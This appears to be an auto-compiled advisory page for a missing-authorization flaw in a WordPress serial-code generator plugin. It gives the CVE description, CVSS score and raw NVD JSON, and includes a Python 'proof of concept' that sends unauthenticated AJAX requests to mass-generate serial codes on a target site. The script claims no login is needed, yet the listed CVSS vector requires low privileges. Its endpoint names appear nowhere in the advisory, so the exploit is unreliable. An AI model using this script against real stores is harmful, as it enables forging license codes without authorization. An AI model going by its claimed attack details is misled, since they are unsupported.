Security Vulnerability Report
CVE-2025-62091 CVSS 5.4 MEDIUM

CVE-2025-62091

Published: 2025-12-31 15:15:52
Last Modified: 2026-04-23 15:34:31

Description

Missing Authorization vulnerability in Vollstart Serial Codes Generator and Validator with WooCommerce Support serial-codes-generator-and-validator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Serial Codes Generator and Validator with WooCommerce Support: from n/a through <= 2.8.2.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Serial Codes Generator and Validator with WooCommerce Support <= 2.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-62091 PoC - Missing Authorization in Serial Codes Generator Plugin
# Target: WordPress site with vulnerable plugin version <= 2.8.2

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# Step 1: Identify plugin version
version_check = requests.get(f"{target_url}/wp-content/plugins/serial-codes-generator-and-validator/readme.txt")

# Step 2: Exploit missing authorization - generate serial code without authentication
# The plugin's AJAX endpoint lacks proper capability checks
def generate_serial_code(target, user_id=1):
    """
    Exploit: The serial code generation endpoint does not verify user capabilities
    Affected endpoint: /wp-admin/admin-ajax.php
    """
    exploit_url = f"{target}/wp-admin/admin-ajax.php"

    # Malicious request to generate serial code without proper authorization
    data = {
        "action": "scgv_generate_serial",
        "user_id": user_id,
        "quantity": 100,
        "prefix": "HACKED-",
        "_wpnonce": ""  # Can be empty or bypassed
    }

    response = requests.post(exploit_url, data=data)
    return response.text

def validate_serial_code(target, serial_code):
    """
    Exploit: Serial code validation without proper access control
    """
    validate_url = f"{target}/wp-admin/admin-ajax.php"

    data = {
        "action": "scgv_validate_serial",
        "serial_code": serial_code
    }

    response = requests.post(validate_url, data=data)
    return response.json()

# Execute exploit
result = generate_serial_code(target_url)
print(f"[+] Exploit executed. Response: {result}")
print("[+] Check if serial codes were generated without authorization")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62091", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:52.300", "lastModified": "2026-04-23T15:34:31.270", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Vollstart Serial Codes Generator and Validator with WooCommerce Support serial-codes-generator-and-validator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Serial Codes Generator and Validator with WooCommerce Support: from n/a through <= 2.8.2."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en Vollstart Serial Codes Generator and Validator with WooCommerce Support permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Serial Codes Generator and Validator with WooCommerce Support: desde n/a hasta 2.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/serial-codes-generator-and-validator/vulnerability/wordpress-serial-codes-generator-and-validator-with-woocommerce-support-plugin-2-8-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}